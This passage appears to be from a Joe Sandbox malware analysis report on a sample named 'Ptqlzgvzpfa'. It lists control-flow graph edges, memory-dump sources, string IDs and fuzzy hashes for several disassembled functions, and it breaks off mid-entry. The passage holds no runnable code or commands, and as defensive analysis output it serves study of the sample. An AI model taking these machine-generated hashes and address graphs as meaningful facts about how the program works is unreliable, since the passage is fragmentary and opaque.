6425b0c-6425b25 1834->1841 1842 6425d03-6425d05 1835->1842 1843 6425d01 1835->1843 1848 6425d14-6425d16 1836->1848 1849 6425d1b-6425d29 call 6423170 1836->1849 1846 6425d60-6425d62 1838->1846 1847 6425d5e 1838->1847 1850 6425e00-6425e11 call 6423170 1839->1850 1851 6425d75-6425d83 call 6423170 1839->1851 1841->1803 1868 6425b27-6425b3b call 6421fa0 1841->1868 1842->1836 1843->1836 1844->1815 1844->1816 1845->1844 1879 6425c54-6425c62 1845->1879 1846->1839 1847->1839 1848->1766 1862 6425d41 1849->1862 1863 6425d2b-6425d31 1849->1863 1860 6425e13-6425e19 1850->1860 1861 6425e29-6425e2c 1850->1861 1864 6425d85-6425d8b 1851->1864 1865 6425d9b-6425dae call 6423170 1851->1865 1869 6425e1b 1860->1869 1870 6425e1d-6425e1f 1860->1870 1861->1821 1872 6425e32-6425e43 call 6423170 1861->1872 1862->1766 1873 6425d33 1863->1873 1874 6425d35-6425d37 1863->1874 1875 6425d8f-6425d91 1864->1875 1876 6425d8d 1864->1876 1881 6425db0-6425db6 1865->1881 1882 6425dc6-6425dd3 1865->1882 1868->1803 1869->1861 1870->1861 1888 6425e45-6425e4b 1872->1888 1889 6425e5b-6425e6b call 6423170 1872->1889 1873->1862 1874->1862 1875->1865 1876->1865 1879->1844 1893 6425c64-6425c68 1879->1893 1885 6425dba-6425dbc 1881->1885 1886 6425db8 1881->1886 1882->1850 1897 6425dd5-6425de3 call 6423170 1882->1897 1885->1882 1886->1882 1894 6425e4f-6425e51 1888->1894 1895 6425e4d 1888->1895 1899 6425e83-6425e90 1889->1899 1900 6425e6d-6425e73 1889->1900 1893->1794 1898 6425c6e-6425c97 1893->1898 1894->1889 1895->1889 1907 6425de5-6425deb 1897->1907 1908 6425dfb 1897->1908 1898->1844 1916 6425c99-6425cb7 call 6421fa0 1898->1916 1899->1821 1910 6425e92-6425ea3 call 6423170 1899->1910 1902 6425e77-6425e79 1900->1902 1903 6425e75 1900->1903 1902->1899 1903->1899 1911 6425def-6425df1 1907->1911 1912 6425ded 1907->1912 1908->1766 1917 6425ea5-6425eab 1910->1917 1918 6425ebb 1910->1918 1911->1908 1912->1908 1916->1844 1919 6425eaf-6425eb1 1917->1919 1920 6425ead 1917->1920 1918->1766 1919->1918 1920->1918
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Pl]q$$]q
                                                          • API String ID: 0-2369359564
                                                          • Opcode ID: cfaeacd7733e967665f42aa5524c946612d6ab7f7beb3d51570f8eac0e96cf57
                                                          • Instruction ID: 64966a2ae4db705c0abfd6d24fb39e6d78f562a55a4241bc133982eb452ca89c
                                                          • Opcode Fuzzy Hash: cfaeacd7733e967665f42aa5524c946612d6ab7f7beb3d51570f8eac0e96cf57
                                                          • Instruction Fuzzy Hash: 5B327B34B40216CFDB59DF29C584A6A77F6BF88701BA584AAD406CB361DB31DC42CB61
                                                          Function 062B0048 Relevance: 5.7, Strings: 3, Instructions: 1926COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481025120.00000000062B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_62b0000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: &$4']q$4']q
                                                          • API String ID: 0-521613236
                                                          • Opcode ID: eb1a681ec1247d0396830830556ca9dff5c2faba894ea0d86d0ea9b1c786fcd8
                                                          • Instruction ID: bd3721c30579737e6ccf683ddd4c55773d989746c928e882bd3836f2c6a185af
                                                          • Opcode Fuzzy Hash: eb1a681ec1247d0396830830556ca9dff5c2faba894ea0d86d0ea9b1c786fcd8
                                                          • Instruction Fuzzy Hash: B4F2C03091A3899FDB26CBB4DC69BEE7FB5EF06340F144096E9409B2E2C7745845CB62
                                                          Function 06425FE0 Relevance: 5.2, Strings: 4, Instructions: 207COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1190 6425fe0-6426008 1192 64260f4-6426119 1190->1192 1193 642600e-6426012 1190->1193 1201 6426120-6426131 1192->1201 1194 6426026-642602a 1193->1194 1195 6426014-6426020 1193->1195 1197 6426030-6426047 1194->1197 1198 642614b-6426170 1194->1198 1195->1194 1195->1201 1208 642605b-642605f 1197->1208 1209 6426049-6426055 1197->1209 1218 6426177-64261b0 1198->1218 1213 642613b-6426144 1201->1213 1210 6426061-642607a 1208->1210 1211 642608b-64260a4 call 64230a8 1208->1211 1209->1208 1209->1218 1210->1211 1223 642607c-642607f 1210->1223 1224 64260a6-64260ca 1211->1224 1225 64260cd-64260f1 1211->1225 1213->1198 1218->1213 1233 64261b2-64261ca 1218->1233 1228 6426088 1223->1228 1228->1211 1234 6426202-6426227 1233->1234 1235 64261cc-64261ec 1233->1235 1242 642622e-642626f 1234->1242 1235->1242 1243 64261ee-64261ff 1235->1243
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$(aq$(aq$(aq
                                                          • API String ID: 0-3514690552
                                                          • Opcode ID: 0054b9bd88c0dcf42b8fac02fed3561dd1dacc7993f97af5e90bf00e29b4d272
                                                          • Instruction ID: 66fc620876c0f1516edab84c75cdb4012617e4f1ce70ed0c05794d70d40359ec
                                                          • Opcode Fuzzy Hash: 0054b9bd88c0dcf42b8fac02fed3561dd1dacc7993f97af5e90bf00e29b4d272
                                                          • Instruction Fuzzy Hash: CC71B1317002568FCB86DF29D850AAF3BA6EF95301F65816AE805CB396CF35DC46C791
                                                          Function 06427EE8 Relevance: 4.2, Strings: 3, Instructions: 479COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1330 6427ee8-6427f10 1332 6427f12-6427f59 1330->1332 1333 6427f5e-6427f6c 1330->1333 1383 64283b5-64283bc 1332->1383 1334 6427f7b 1333->1334 1335 6427f6e-6427f79 call 6425a10 1333->1335 1338 6427f7d-6427f84 1334->1338 1335->1338 1340 6427f8a-6427f8e 1338->1340 1341 642806d-6428071 1338->1341 1342 6427f94-6427f98 1340->1342 1343 64283bd-64283e5 1340->1343 1344 6428073-6428082 call 6423c28 1341->1344 1345 64280c7-64280d1 1341->1345 1347 6427faa-6428008 call 6425750 call 64261b8 1342->1347 1348 6427f9a-6427fa4 1342->1348 1352 64283ec-6428416 1343->1352 1360 6428086-642808b 1344->1360 1349 64280d3-64280e2 call 6423348 1345->1349 1350 642810a-6428130 1345->1350 1392 642847b-64284a5 1347->1392 1393 642800e-6428068 1347->1393 1348->1347 1348->1352 1364 64280e8-6428105 1349->1364 1365 642841e-6428434 1349->1365 1371 6428132-642813b 1350->1371 1372 642813d 1350->1372 1352->1365 1366 6428084 1360->1366 1367 642808d-64280c2 call 6427db8 1360->1367 1364->1383 1390 642843c-6428474 1365->1390 1366->1360 1367->1383 1380 642813f-6428167 1371->1380 1372->1380 1396 6428238-642823c 1380->1396 1397 642816d-6428186 1380->1397 1390->1392 1402 64284a7-64284ad 1392->1402 1403 64284af-64284b5 1392->1403 1393->1383 1400 64282b6-64282c0 1396->1400 1401 642823e-6428257 1396->1401 1397->1396 1424 642818c-642819b call 6423170 1397->1424 1406 64282c2-64282cc 1400->1406 1407 642831d-6428326 1400->1407 1401->1400 1428 6428259-6428268 call 6423170 1401->1428 1402->1403 1404 64284b6-64284f3 1402->1404 1422 64282d2-64282e4 1406->1422 1423 64282ce-64282d0 1406->1423 1411 6428328-6428356 call 6424f60 call 6424f80 1407->1411 1412 642835e-64283ab 1407->1412 1411->1412 1435 64283b3 1412->1435 1429 64282e6-64282e8 1422->1429 1423->1429 1438 64281b3-64281c8 1424->1438 1439 642819d-64281a3 1424->1439 1453 6428280-642828b 1428->1453 1454 642826a-6428270 1428->1454 1433 6428316-642831b 1429->1433 1434 64282ea-64282ee 1429->1434 1433->1406 1433->1407 1442 64282f0-6428309 1434->1442 1443 642830c-6428311 call 6421f70 1434->1443 1435->1383 1450 64281ca-64281f6 call 64240b0 1438->1450 1451 64281fc-6428205 1438->1451 1446 64281a7-64281a9 1439->1446 1447 64281a5 1439->1447 1442->1443 1443->1433 1446->1438 1447->1438 1450->1390 1450->1451 1451->1392 1459 642820b-6428232 1451->1459 1453->1392 1455 6428291-64282b4 1453->1455 1460 6428272 1454->1460 1461 6428274-6428276 1454->1461 1455->1400 1455->1428 1459->1396 1459->1424 1460->1453 1461->1453
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Haq$Haq$Haq
                                                          • API String ID: 0-3013282719
                                                          • Opcode ID: 24ef82fd8cf1f311fe68ff6f8b8aeede6afc7c75025505092d5f790960447021
                                                          • Instruction ID: 5b5b65bffac98bd4da429a4351f65c40bb22c45117dcf3b0fa24967797fc9128
                                                          • Opcode Fuzzy Hash: 24ef82fd8cf1f311fe68ff6f8b8aeede6afc7c75025505092d5f790960447021
                                                          • Instruction Fuzzy Hash: F7128230A006158FCB95DFA5C884AAEB7F6FF88300F64852DD5069B755DB35EC4ACB90
                                                          Function 0642E2F0 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1472 642e2f0-642e2fc 1473 642e2d0-642e2ed 1472->1473 1474 642e2fe-642e310 1472->1474 1475 642e316-642e31a 1474->1475 1476 642e429-642e44e 1474->1476 1478 642e320-642e329 1475->1478 1479 642e455-642e47a 1475->1479 1476->1479 1480 642e481-642e4b7 1478->1480 1481 642e32f-642e356 1478->1481 1479->1480 1500 642e4be-642e514 1480->1500 1493 642e41e-642e428 1481->1493 1494 642e35c-642e35e 1481->1494 1496 642e360-642e363 1494->1496 1497 642e37f-642e381 1494->1497 1499 642e369-642e373 1496->1499 1496->1500 1498 642e384-642e388 1497->1498 1501 642e38a-642e399 1498->1501 1502 642e3e9-642e3f5 1498->1502 1499->1500 1504 642e379-642e37d 1499->1504 1515 642e516-642e52a 1500->1515 1516 642e538-642e54f 1500->1516 1501->1500 1510 642e39f-642e3e6 call 6421fa0 1501->1510 1502->1500 1505 642e3fb-642e418 call 6421fa0 1502->1505 1504->1497 1504->1498 1505->1493 1505->1494 1510->1502 1592 642e52d call 642eb7a 1515->1592 1593 642e52d call 642ea18 1515->1593 1524 642e640-642e650 1516->1524 1525 642e555-642e63b call 6429b20 call 6429528 * 2 call 6429b60 call 642d338 call 6429528 call 642c4d0 call 642a3c8 1516->1525 1523 642e533 1527 642e763-642e76e 1523->1527 1536 642e656-642e730 call 6429b20 * 2 call 642a2d8 call 6429528 * 2 call 64297d8 call 6429c70 call 6429528 1524->1536 1537 642e73e-642e75a call 6429528 1524->1537 1525->1524 1533 642e770-642e780 1527->1533 1534 642e79d-642e7be call 6429c70 1527->1534 1546 642e782-642e788 1533->1546 1547 642e790-642e798 call 642a3c8 1533->1547 1589 642e732 1536->1589 1590 642e73b 1536->1590 1537->1527 1546->1547 1547->1534 1589->1590 1590->1537 1592->1523 1593->1523
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$(aq$Haq
                                                          • API String ID: 0-2456560092
                                                          • Opcode ID: 9e0a378d21aca6d61446e90b0c1f125a7e14a28e1976a760062c9300bfb56a29
                                                          • Instruction ID: d8f6877aa4b54ba70408898a8a99058ab819c51bf781716bbd504b4efab2b6d8
                                                          • Opcode Fuzzy Hash: 9e0a378d21aca6d61446e90b0c1f125a7e14a28e1976a760062c9300bfb56a29
                                                          • Instruction Fuzzy Hash: 60F17434A00219DFCB44EF65D89499EBBB2FF89300F608569E506AB365DF34ED46CB90
                                                          Function 06429D18 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1594 6429d18-6429d55 1596 6429d77-6429d8d call 6429b20 1594->1596 1597 6429d57-6429d5a 1594->1597 1603 642a103-642a117 1596->1603 1604 6429d93-6429d9f 1596->1604 1709 6429d5c call 642a630 1597->1709 1710 6429d5c call 642a678 1597->1710 1711 6429d5c call 642a688 1597->1711 1599 6429d62-6429d64 1599->1596 1601 6429d66-6429d6e 1599->1601 1601->1596 1614 642a157-642a160 1603->1614 1605 6429ed0-6429ed7 1604->1605 1606 6429da5-6429da8 1604->1606 1609 642a006-642a043 call 6429528 call 642c4d0 1605->1609 1610 6429edd-6429ee6 1605->1610 1607 6429dab-6429db4 1606->1607 1612 6429dba-6429dce 1607->1612 1613 642a1f8 1607->1613 1653 642a049-642a0fa call 6429528 1609->1653 1610->1609 1615 6429eec-6429ff8 call 6429528 call 6429ab8 call 6429528 1610->1615 1629 6429ec0-6429eca 1612->1629 1630 6429dd4-6429e69 call 6429b20 * 2 call 6429528 call 6429ab8 call 6429b60 call 6429c08 call 6429c70 1612->1630 1621 642a1fd-642a201 1613->1621 1616 642a162-642a169 1614->1616 1617 642a125-642a12e 1614->1617 1705 642a003-642a004 1615->1705 1706 6429ffa 1615->1706 1619 642a1b7-642a1be 1616->1619 1620 642a16b-642a1ae call 6429528 1616->1620 1617->1613 1623 642a134-642a146 1617->1623 1631 642a1e3-642a1f6 1619->1631 1632 642a1c0-642a1d0 1619->1632 1620->1619 1627 642a203 1621->1627 1628 642a20c 1621->1628 1641 642a156 1623->1641 1642 642a148-642a14d 1623->1642 1627->1628 1640 642a20d 1628->1640 1629->1605 1629->1607 1685 6429e6b-6429e83 call 6429c08 call 6429528 call 64297d8 1630->1685 1686 6429e88-6429ebb call 6429c70 1630->1686 1631->1621 1632->1631 1643 642a1d2-642a1da 1632->1643 1640->1640 1641->1614 1712 642a150 call 642cc62 1642->1712 1713 642a150 call 642cc70 1642->1713 1643->1631 1653->1603 1685->1686 1686->1629 1705->1609 1706->1705 1709->1599 1710->1599 1711->1599 1712->1641 1713->1641
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q$4']q
                                                          • API String ID: 0-705557208
                                                          • Opcode ID: 8a2d848e1c375228d911b35f09ef13280e8148bdc8d0778675ac6d383b416aa6
                                                          • Instruction ID: 054690030d9bccd3971dffa95655dc766daae8b5437402250ab0fc15f43fc510
                                                          • Opcode Fuzzy Hash: 8a2d848e1c375228d911b35f09ef13280e8148bdc8d0778675ac6d383b416aa6
                                                          • Instruction Fuzzy Hash: 51F1ED34B00129DFCB49DFA5D998A9DBBB2FF88301F618159E905AB365DB70EC42CB50
                                                          Function 06424408 Relevance: 3.0, Strings: 2, Instructions: 516COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1925 6424408-642442e 1926 6424430-642443d 1925->1926 1927 642443f-6424448 1925->1927 1926->1927 1928 642444b-6424458 1926->1928 1930 6424463 1928->1930 1931 642445a-6424461 1928->1931 1932 642446a-6424494 1930->1932 1931->1932 1933 6424496 1932->1933 1934 642449d-64244b0 call 64240e8 1932->1934 1933->1934 1937 64244b6-64244c9 1934->1937 1938 64245f4-64245fb 1934->1938 1944 64244d7-64244f1 1937->1944 1945 64244cb-64244d2 1937->1945 1939 6424601-6424616 1938->1939 1940 6424895-642489c 1938->1940 1950 6424636-642463c 1939->1950 1951 6424618-642461a 1939->1951 1942 642490b-6424912 1940->1942 1943 642489e-64248a7 1940->1943 1946 6424918-6424921 1942->1946 1947 64249ae-64249b5 1942->1947 1943->1942 1949 64248a9-64248bc 1943->1949 1968 64244f3-64244f6 1944->1968 1969 64244f8-6424505 1944->1969 1952 64245ed 1945->1952 1946->1947 1953 6424927-642493a 1946->1953 1954 64249d1-64249d7 1947->1954 1955 64249b7-64249c8 1947->1955 1949->1942 1964 64248be-6424903 call 64219a0 1949->1964 1960 6424642-6424644 1950->1960 1961 6424704-6424708 1950->1961 1951->1950 1956 642461c-6424633 1951->1956 1952->1938 1976 642493c-642494b 1953->1976 1977 642494d-6424951 1953->1977 1958 64249e9-64249f2 1954->1958 1959 64249d9-64249df 1954->1959 1955->1954 1972 64249ca 1955->1972 1956->1950 1965 64249e1-64249e7 1959->1965 1966 64249f5-6424a39 1959->1966 1960->1961 1967 642464a-64246cb call 64219a0 * 4 1960->1967 1961->1940 1970 642470e-6424710 1961->1970 1964->1942 2008 6424905-6424908 1964->2008 1965->1958 1965->1966 2020 6424a41-6424a6a 1966->2020 2038 64246e2-6424701 call 64219a0 1967->2038 2039 64246cd-64246df call 64219a0 1967->2039 1974 6424507-642451b 1968->1974 1969->1974 1970->1940 1975 6424716-642471f 1970->1975 1972->1954 1974->1952 2001 6424521-6424575 1974->2001 1984 6424872-6424878 1975->1984 1976->1977 1978 6424953-6424955 1977->1978 1979 6424971-6424973 1977->1979 1978->1979 1986 6424957-642496e 1978->1986 1979->1947 1987 6424975-642497b 1979->1987 1988 642487a-6424889 1984->1988 1989 642488b 1984->1989 1986->1979 1987->1947 1992 642497d-64249ab 1987->1992 1995 642488d-642488f 1988->1995 1989->1995 1992->1947 1995->1940 2000 6424724-6424732 call 6423170 1995->2000 2010 6424734-642473a 2000->2010 2011 642474a-6424764 2000->2011 2049 6424583-6424587 2001->2049 2050 6424577-6424579 2001->2050 2008->1942 2016 642473e-6424740 2010->2016 2017 642473c 2010->2017 2011->1984 2023 642476a-642476e 2011->2023 2016->2011 2017->2011 2046 6424a78 2020->2046 2047 6424a6c-6424a76 2020->2047 2027 6424770-6424779 2023->2027 2028 642478f 2023->2028 2030 6424780-6424783 2027->2030 2031 642477b-642477e 2027->2031 2032 6424792-64247ac 2028->2032 2036 642478d 2030->2036 2031->2036 2032->1984 2051 64247b2-6424833 call 64219a0 * 4 2032->2051 2036->2032 2038->1961 2039->2038 2052 6424a7d-6424a7f 2046->2052 2047->2052 2049->1952 2053 6424589-64245a1 2049->2053 2050->2049 2079 6424835-6424847 call 64219a0 2051->2079 2080 642484a-6424870 call 64219a0 2051->2080 2054 6424a81-6424a84 2052->2054 2055 6424a86-6424a8b 2052->2055 2053->1952 2059 64245a3-64245af 2053->2059 2058 6424a91-6424abe 2054->2058 2055->2058 2061 64245b1-64245b4 2059->2061 2062 64245be-64245c4 2059->2062 2061->2062 2064 64245c6-64245c9 2062->2064 2065 64245cc-64245d5 2062->2065 2064->2065 2068 64245d7-64245da 2065->2068 2069 64245e4-64245ea 2065->2069 2068->2069 2069->1952 2079->2080 2080->1940 2080->1984
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $]q$$]q
                                                          • API String ID: 0-127220927
                                                          • Opcode ID: cb90a407f3899639e13f9ccc4b861b307c61ea6220adec0a12fffee122835334
                                                          • Instruction ID: f338ffe307ae700c8b7329e2ccca5fea45e5b2849211f1e0b9b91ffd635e1c65
                                                          • Opcode Fuzzy Hash: cb90a407f3899639e13f9ccc4b861b307c61ea6220adec0a12fffee122835334
                                                          • Instruction Fuzzy Hash: 3722BE34E0022ACFCB55DFA8C854AAEBBF2FF48704F648116E551A7394CB349946CFA1
                                                          Function 062B1DA8 Relevance: 3.0, Strings: 2, Instructions: 488COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2085 62b1da8-62b1dd3 2086 62b1dda-62b1df9 2085->2086 2087 62b1dd5 2085->2087 2088 62b1dfb-62b1e04 2086->2088 2089 62b1e1a 2086->2089 2087->2086 2090 62b1e0b-62b1e0e 2088->2090 2091 62b1e06-62b1e09 2088->2091 2092 62b1e1d-62b1e21 2089->2092 2093 62b1e18 2090->2093 2091->2093 2094 62b23dc-62b23f3 2092->2094 2093->2092 2096 62b23f9-62b23fd 2094->2096 2097 62b1e26-62b1e2a 2094->2097 2100 62b23ff-62b242f 2096->2100 2101 62b2432-62b2436 2096->2101 2098 62b1e2f-62b1e33 2097->2098 2099 62b1e2c-62b1e87 2097->2099 2105 62b1e5c-62b1e7e 2098->2105 2106 62b1e35-62b1e59 2098->2106 2110 62b1e89-62b1ee5 2099->2110 2111 62b1e8c-62b1e90 2099->2111 2100->2101 2102 62b2438-62b2441 2101->2102 2103 62b2457 2101->2103 2107 62b2448-62b244b 2102->2107 2108 62b2443-62b2446 2102->2108 2109 62b245a-62b2460 2103->2109 2105->2094 2106->2105 2113 62b2455 2107->2113 2108->2113 2119 62b1eea-62b1eee 2110->2119 2120 62b1ee7-62b1f48 2110->2120 2116 62b1eb9-62b1edc 2111->2116 2117 62b1e92-62b1eb6 2111->2117 2113->2109 2116->2094 2117->2116 2125 62b1ef0-62b1f14 2119->2125 2126 62b1f17-62b1f2e 2119->2126 2129 62b1f4a-62b1fa6 2120->2129 2130 62b1f4d-62b1f51 2120->2130 2125->2126 2140 62b1f3e-62b1f3f 2126->2140 2141 62b1f30-62b1f36 2126->2141 2142 62b1fab-62b1faf 2129->2142 2143 62b1fa8-62b2004 2129->2143 2136 62b1f7a-62b1f9d 2130->2136 2137 62b1f53-62b1f77 2130->2137 2136->2094 2137->2136 2140->2094 2141->2140 2146 62b1fd8-62b1ffb 2142->2146 2147 62b1fb1-62b1fd5 2142->2147 2151 62b2009-62b200d 2143->2151 2152 62b2006-62b2062 2143->2152 2146->2094 2147->2146 2156 62b200f-62b2033 2151->2156 2157 62b2036-62b2059 2151->2157 2161 62b2067-62b206b 2152->2161 2162 62b2064-62b20c0 2152->2162 2156->2157 2157->2094 2165 62b206d-62b2091 2161->2165 2166 62b2094-62b20b7 2161->2166 2171 62b20c2-62b2123 2162->2171 2172 62b20c5-62b20c9 2162->2172 2165->2166 2166->2094 2181 62b2128-62b212c 2171->2181 2182 62b2125-62b218d 2171->2182 2175 62b20cb-62b20ef 2172->2175 2176 62b20f2-62b2109 2172->2176 2175->2176 2193 62b210b-62b2111 2176->2193 2194 62b2119-62b211a 2176->2194 2185 62b212e-62b215e 2181->2185 2186 62b2161-62b2184 2181->2186 2191 62b218f-62b21f7 2182->2191 2192 62b2192-62b2196 2182->2192 2185->2186 2186->2094 2202 62b21f9-62b2261 2191->2202 2203 62b21fc-62b2200 2191->2203 2196 62b21cb-62b21e5 2192->2196 2197 62b2198-62b21c8 2192->2197 2193->2194 2194->2094 2221 62b21ed-62b21ee 2196->2221 2197->2196 2212 62b2263-62b22cb 2202->2212 2213 62b2266-62b226a 2202->2213 2205 62b2202-62b2232 2203->2205 2206 62b2235-62b2258 2203->2206 2205->2206 2206->2094 2222 62b22cd-62b2335 2212->2222 2223 62b22d0-62b22d4 2212->2223 2215 62b229f-62b22c2 2213->2215 2216 62b226c-62b229c 2213->2216 2215->2094 2216->2215 2221->2094 2232 62b233a-62b233e 2222->2232 2233 62b2337-62b239c 2222->2233 2224 62b2309-62b232c 2223->2224 2225 62b22d6-62b2306 2223->2225 2224->2094 2225->2224 2240 62b2373-62b2396 2232->2240 2241 62b2340-62b2370 2232->2241 2242 62b239e-62b23ce 2233->2242 2243 62b23d1-62b23d4 2233->2243 2240->2094 2241->2240 2242->2243 2243->2094
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481025120.00000000062B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_62b0000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: d6493eeb64adc431c80483998a22e55e68fec834e038970d353762490a67a36b
                                                          • Instruction ID: 7ebfda659e0e10c71ad8c683033ed444a5d5289e34660cadb0da8a132e488b56
                                                          • Opcode Fuzzy Hash: d6493eeb64adc431c80483998a22e55e68fec834e038970d353762490a67a36b
                                                          • Instruction Fuzzy Hash: 9322E330D21218CFCBA4DFA4D9986EDB7B2FF49341F609069D806AB258CB785E85CF41
                                                          Function 062B18C0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2256 62b18c0-62b18e8 2257 62b18ea 2256->2257 2258 62b18ef-62b1918 2256->2258 2257->2258 2259 62b191a-62b1923 2258->2259 2260 62b1939 2258->2260 2262 62b192a-62b192d 2259->2262 2263 62b1925-62b1928 2259->2263 2261 62b193c-62b1940 2260->2261 2265 62b1cf7-62b1d0e 2261->2265 2264 62b1937 2262->2264 2263->2264 2264->2261 2267 62b1945-62b1949 2265->2267 2268 62b1d14-62b1d18 2265->2268 2269 62b194b-62b19a8 2267->2269 2270 62b194e-62b1952 2267->2270 2271 62b1d1a-62b1d4a 2268->2271 2272 62b1d4d-62b1d51 2268->2272 2278 62b19aa-62b1a1b 2269->2278 2279 62b19ad-62b19b1 2269->2279 2274 62b197b-62b197e 2270->2274 2275 62b1954-62b1978 2270->2275 2271->2272 2276 62b1d53-62b1d5c 2272->2276 2277 62b1d72 2272->2277 2289 62b1986-62b199f 2274->2289 2275->2274 2282 62b1d5e-62b1d61 2276->2282 2283 62b1d63-62b1d66 2276->2283 2280 62b1d75-62b1d7b 2277->2280 2290 62b1a1d-62b1a7a 2278->2290 2291 62b1a20-62b1a24 2278->2291 2286 62b19da-62b19eb 2279->2286 2287 62b19b3-62b19d7 2279->2287 2284 62b1d70 2282->2284 2283->2284 2284->2280 2381 62b19ee call 64732b2 2286->2381 2382 62b19ee call 64732c0 2286->2382 2287->2286 2289->2265 2300 62b1a7f-62b1a83 2290->2300 2301 62b1a7c-62b1ad8 2290->2301 2295 62b1a4d-62b1a71 2291->2295 2296 62b1a26-62b1a4a 2291->2296 2295->2265 2296->2295 2304 62b1aac-62b1acf 2300->2304 2305 62b1a85-62b1aa9 2300->2305 2313 62b1ada-62b1b3c 2301->2313 2314 62b1add-62b1ae1 2301->2314 2304->2265 2305->2304 2310 62b19f4-62b1a01 2311 62b1a03-62b1a09 2310->2311 2312 62b1a11-62b1a12 2310->2312 2311->2312 2312->2265 2323 62b1b3e-62b1ba0 2313->2323 2324 62b1b41-62b1b45 2313->2324 2317 62b1b0a-62b1b22 2314->2317 2318 62b1ae3-62b1b07 2314->2318 2335 62b1b32-62b1b33 2317->2335 2336 62b1b24-62b1b2a 2317->2336 2318->2317 2333 62b1ba2-62b1c04 2323->2333 2334 62b1ba5-62b1ba9 2323->2334 2327 62b1b6e-62b1b86 2324->2327 2328 62b1b47-62b1b6b 2324->2328 2346 62b1b88-62b1b8e 2327->2346 2347 62b1b96-62b1b97 2327->2347 2328->2327 2344 62b1c09-62b1c0d 2333->2344 2345 62b1c06-62b1c68 2333->2345 2338 62b1bab-62b1bcf 2334->2338 2339 62b1bd2-62b1bea 2334->2339 2335->2265 2336->2335 2338->2339 2357 62b1bfa-62b1bfb 2339->2357 2358 62b1bec-62b1bf2 2339->2358 2349 62b1c0f-62b1c33 2344->2349 2350 62b1c36-62b1c4e 2344->2350 2355 62b1c6a-62b1cc3 2345->2355 2356 62b1c6d-62b1c71 2345->2356 2346->2347 2347->2265 2349->2350 2368 62b1c5e-62b1c5f 2350->2368 2369 62b1c50-62b1c56 2350->2369 2366 62b1cec-62b1cef 2355->2366 2367 62b1cc5-62b1ce9 2355->2367 2360 62b1c9a-62b1cbd 2356->2360 2361 62b1c73-62b1c97 2356->2361 2357->2265 2358->2357 2360->2265 2361->2360 2366->2265 2367->2366 2368->2265 2369->2368 2381->2310 2382->2310
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481025120.00000000062B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_62b0000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: 1038d3fc78b050f88b9abce4e57757491d5d60cfead2f4a2bb0dc0a2e07135d2
